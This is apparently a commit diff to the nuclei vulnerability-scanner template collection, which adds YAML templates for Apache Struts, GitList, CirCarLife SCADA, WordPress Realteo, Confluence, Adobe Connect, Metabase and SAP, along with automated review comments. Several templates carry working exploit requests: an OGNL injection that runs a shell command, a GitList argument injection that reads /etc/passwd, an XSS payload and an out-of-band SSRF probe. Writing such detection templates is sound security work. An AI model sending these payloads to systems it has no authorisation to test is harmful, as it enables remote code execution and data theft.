Merge remote-tracking branch 'origin/master' into skar4444

patch-1
Suman Kar 2021-06-16 21:15:54 +05:30
commit b9c59c18a3
17 changed files with 371 additions and 12 deletions


@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
| cves | 338 | vulnerabilities | 180 | exposed-panels | 148 |
| takeovers | 67 | exposures | 107 | technologies | 100 |
| cves | 344 | vulnerabilities | 182 | exposed-panels | 149 |
| takeovers | 67 | exposures | 107 | technologies | 103 |
| misconfiguration | 68 | workflows | 32 | miscellaneous | 24 |
| default-logins | 30 | file | 42 | dns | 10 |
| fuzzing | 10 | helpers | 8 | iot | 13 |
| fuzzing | 10 | helpers | 9 | iot | 13 |
**115 directories, 1280 files**.
**118 directories, 1295 files**.
</td>
</tr>


@ -0,0 +1,20 @@
id: CVE-2013-2248
info:
name: Apache Struts - Multiple Open Redirection Vulnerabilities
author: 0x_Akoko
description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
reference: https://www.exploit-db.com/exploits/38666
severity: low
tags: cve,cve2013,apache,redirect,struts
requests:
- method: GET
path:
- "{{BaseURL}}/index.action?redirect:http://www.example.com/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
part: header
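Review bot: The Location-header regex is the only matcher, so nothing ties the finding to an actual redirect response; the regex on its own cannot tell a 3xx from any other response that carries a Location header. Adding `matchers-condition: and` with a status matcher `- type: status` / `status: [301, 302, 303, 307, 308]` pins the match to a real redirect and cuts false positives. The `reference` field is a plain scalar here while CVE-2018-16668 in the same commit uses a list; either parses, but one form should be used consistently so tooling that iterates references behaves the same for every template.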


@ -2,7 +2,7 @@ id: CVE-2013-2251
info:
name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
author: exploitation,dwisiswant0
author: exploitation,dwisiswant0,alex
severity: critical
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
reference: http://struts.apache.org/release/2.3.x/docs/s2-016.html
@ -29,6 +29,13 @@ requests:
Accept: */*
Accept-Language: en
- |
GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
Accept-Language: en
matchers-condition: and
matchers:
- type: status
@ -39,10 +46,4 @@ requests:
- type: regex
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
- type: word
words:
- "There is no Action mapped for namespace"
- "The origin server did not find a current representation for the target resource"
- "Apache Tomcat"
condition: or
part: body
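Review bot: The third entry of the new word matcher, `"Apache Tomcat"`, is generic enough that under `condition: or` almost any Tomcat error page satisfies it, so the matcher adds little selectivity on top of the `uid=` regex it is ANDed with; keeping only the two Struts-specific messages makes the added matcher meaningful. The raw request added in the previous hunk is the second in the list and differs from the first only in what it targets as far as this hunk shows; a short comment above it stating which deployment layout it covers, as distinct from the first request, would help maintainers. The `requests:` block starts outside these hunks.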


@ -0,0 +1,39 @@
id: CVE-2018-1000533
info:
name: GitList < 0.6.0 RCE
author: pikpikcu
severity: critical
description: klaussilveira GitList version <= 0.6 contains a Passing incorrectly sanitized input to system function vulnerability in `searchTree` function that can result in Execute any code as PHP user.
reference: https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533
tags: rce,git,cve,cve2018,gitlist
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST /{{path}}/tree/a/search HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
query=--open-files-in-pager=cat%20/etc/passwd
extractors:
- type: regex
name: path
group: 1
internal: true
part: body
regex:
- '<span class="name">(.*?)</span>'
matchers:
- type: word
words:
- "root:/root:/bin/bash"
part: body
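Review bot: `name` says `GitList < 0.6.0` while `description` says `version <= 0.6`, so the affected range is stated inconsistently; pick one range and use it in both places, and tidy the description wording (`contains a Passing incorrectly sanitized input to system function vulnerability ... that can result in Execute any code as PHP user` reads as a pasted fragment). The second request depends on the `path` extractor from the first response; when the `<span class="name">` regex finds nothing (for instance an empty repository list), `{{path}}` is left unexpanded in the request line, which is worth a comment on the extractor such as `# repository name taken from the GitList index page; required by the second request` so the dependency is explicit. The NVD entry for CVE-2018-1000533 would be a useful addition to `reference` next to the vulhub page.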


@ -0,0 +1,28 @@
id: CVE-2018-16668
info:
name: CirCarLife SCADA Installation Paths
description: System software installation path disclosure due to lack of authentication
reference:
- https://www.exploit-db.com/exploits/45384
author: geeknik
severity: medium
tags: cve,cve2018,circarlife,scada,iot,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/html/repository"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "CirCarLife Scada"
- type: word
part: body
words:
- "** Platform sources **"
- "** Application sources **"
condition: and


@ -0,0 +1,28 @@
id: CVE-2018-16670
info:
name: CirCarLife SCADA PLC Status
description: PLC status disclosure due to lack of authentication
reference:
- https://www.exploit-db.com/exploits/45384
author: geeknik
severity: medium
tags: cve,cve2018,circarlife,scada,plc,iot,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/services/user/values.xml?var=STATUS"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "CirCarLife Scada"
- type: word
part: body
words:
- "<values><variable><id>"
- "Reader.STATUS"
condition: and


@ -0,0 +1,30 @@
id: CVE-2018-16671
info:
name: CirCarLife SCADA Device ID
description: System software information disclosure due to lack of authentication
reference:
- https://www.exploit-db.com/exploits/45384
author: geeknik
severity: medium
tags: cve,cve2018,circarlife,scada,iot,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/html/device-id"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "CirCarLife Scada"
- type: word
part: body
words:
- "circontrol"
- type: regex
part: body
regex:
- "(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])"
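Review bot: The date regex `(19|20)\d\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])` matches any date-like string in the body, so under `matchers-condition: and` it contributes almost nothing beyond the `circontrol` word and the header match. A comment above the regex matcher stating what date the page discloses and why it is evidence (e.g. `# build/version date printed on the device-id page`) would make the intent clear, and anchoring the pattern on the label that precedes that date would make it selective. This template shares its `CirCarLife Scada` header matcher with CVE-2018-16668 and CVE-2018-16670.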


@ -14,6 +14,7 @@ requests:
- method: GET
path:
- '{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
- '{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
matchers-condition: and
matchers:
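Review bot: With the added `/jira/secure/...` path every target now receives both probes even when the first one already matched, which doubles requests and can produce two findings for one host; `stop-at-first-match: true` on the request entry limits it to one hit. The `requests:` entry starts outside the hunk and its matchers follow it.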


@ -0,0 +1,34 @@
id: CVE-2021-24237
info:
author: 0x_Akoko
name: Realteo WordPress Plugin <= 1.2.3 - Unauthenticated Reflected XSS
description: The plugin, used by the Findeo Theme, did not properly sanitise the keyword_search, search_radius.
severity: medium
tags: cve,cve2021,realteo,xss,wordpress
reference: |
- https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
- https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
requests:
- method: GET
path:
- '{{BaseURL}}/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "autofocus onfocus=alert(/{{randstr}}/);//"
- "Nothing found"
part: body
condition: and
- type: word
words:
- "text/html"
part: header
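Review bot: `reference: |` makes the two dash-prefixed lines a single literal block string (`"- https://...\n- https://...\n"`) rather than a YAML sequence, so the references are stored as one scalar with literal `- ` prefixes. Write it as a real list: `reference:` followed by `  - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e` and the second URL as a second item, matching the list form used in CVE-2018-16668. The same construct appears in the Confluence sharelinks template added in this commit. The second URL contains square brackets, which are safe as a plain scalar inside a block sequence but are worth quoting so a later reformat to flow style cannot turn them into a flow collection.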


@ -0,0 +1,23 @@
id: adobe-connect-central-login
info:
name: Adobe Connect Central Login
author: dhiyaneshDk
severity: info
tags: adobe,panel
requests:
- method: GET
path:
- "{{BaseURL}}/system/login"
matchers-condition: and
matchers:
- type: word
words:
- '<title>Adobe Connect Central Login</title>'
part: body
- type: status
status:
- 200


@ -0,0 +1,26 @@
id: adobe-connect-username-exposure
info:
name: Adobe Connect Username Exposure
reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html
author: dhiyaneshDk
severity: low
tags: adobe,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/system/help/support"
matchers-condition: and
matchers:
- type: word
words:
- 'Administrators name:'
- 'Support Administrators email address:'
part: body
condition: and
- type: status
status:
- 200


@ -0,0 +1,28 @@
id: adobe-connect-version
info:
name: Adobe Connect Central Version
author: dhiyaneshDk
severity: info
tags: adobe
requests:
- method: GET
path:
- "{{BaseURL}}/version.txt"
matchers-condition: and
matchers:
- type: word
words:
- 'package='
part: body
- type: word
words:
- 'text/plain'
part: header
- type: status
status:
- 200
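Review bot: `package=` combined with `text/plain` and status 200 is a weak signature; any plain-text file at `/version.txt` that contains `package=` would be reported as Adobe Connect. If the Adobe Connect version file carries a product-specific line (to be confirmed against a real instance), match on that instead, and add an `extractors:` regex so the version is surfaced in the finding rather than merely detected. A `description` and a `reference` field would also bring this template in line with the sibling `adobe-connect-username-exposure` template.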


@ -0,0 +1,31 @@
id: metabase-version-detect
info:
name: Detect Metabase Version
author: revblock
description: If a Metabase instance is deployed on the target URL it will return a login page with the version number in the page source
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/auth/login"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>Metabase</title>"
- "window.MetabaseBootstrap"
- "window.MetabaseRoot"
part: body
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- '"(v\d+.\d+.\d+)"'
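Review bot: The extractor regex `'"(v\d+.\d+.\d+)"'` leaves the dots unescaped, so `.` matches any character and a string such as `"v1x2y3"` would be extracted; use `'"(v\d+\.\d+\.\d+)"'`. The `info` block also has no `tags` field, unlike every other template in this commit, so the template cannot be selected or excluded by tag (e.g. `tags: metabase,tech`).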


@ -0,0 +1,27 @@
id: sap-web-dispatcher-admin-portal
info:
name: SAP Web Dispatcher admin portal detection
author: randomstr1ng
description: Detection of SAP Web Dispatcher Admin Portal
severity: info
tags: sap,webserver,proxy
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/sap/wdisp/admin/public/default.html"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "SAP NetWeaver Application Server"
- type: word
part: body
words:
- "<title>Administration</title>"


@ -0,0 +1,21 @@
id: sap-web-dispatcher-detection
info:
name: SAP Web Dispatcher detection
author: randomstr1ng
description: Detection of SAP Web Dispatcher service
severity: info
tags: sap,webserver,proxy
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/inormalydonotexist"
matchers:
- type: word
part: body
words:
- "This error page was generated by SAP Web Dispatcher"


@ -0,0 +1,21 @@
id: confluence-ssrf-sharelinks
info:
name: Confluence SSRF in sharelinks
author: TechbrunchFR
severity: medium
description: Vulnerable should be Confluence versions released from 2016 November and older
reference: |
- https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks
- https://github.com/assetnote/blind-ssrf-chains#confluence
tags: confluence,atlassian,ssrf,jira,oob
requests:
- method: GET
path:
- '{{BaseURL}}/rest/sharelinks/1.0/link?url=https://{{interactsh-url}}/'
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
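Review bot: The matcher accepts a DNS interaction alone; a DNS lookup can be triggered by URL validation or pre-resolution without the server ever making the HTTP request, so an `http` interaction on `interactsh_protocol` is the stronger evidence, and the existing `# Confirms the DNS Interaction` comment should say why DNS was judged sufficient for this endpoint. The `description` wording `Vulnerable should be Confluence versions released from 2016 November and older` reads awkwardly; `Affects Confluence versions released in November 2016 and earlier` states the same range more clearly.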


@ -32,6 +32,7 @@ workflows:
- template: cves/2020/CVE-2020-35951.yaml
- template: cves/2020/CVE-2020-35489.yaml
- template: cves/2021/CVE-2021-24146.yaml
- template: cves/2021/CVE-2021-24237.yaml
- template: cves/2021/CVE-2021-24176.yaml
- template: cves/2021/CVE-2021-24285.yaml
- template: cves/2021/CVE-2021-24316.yaml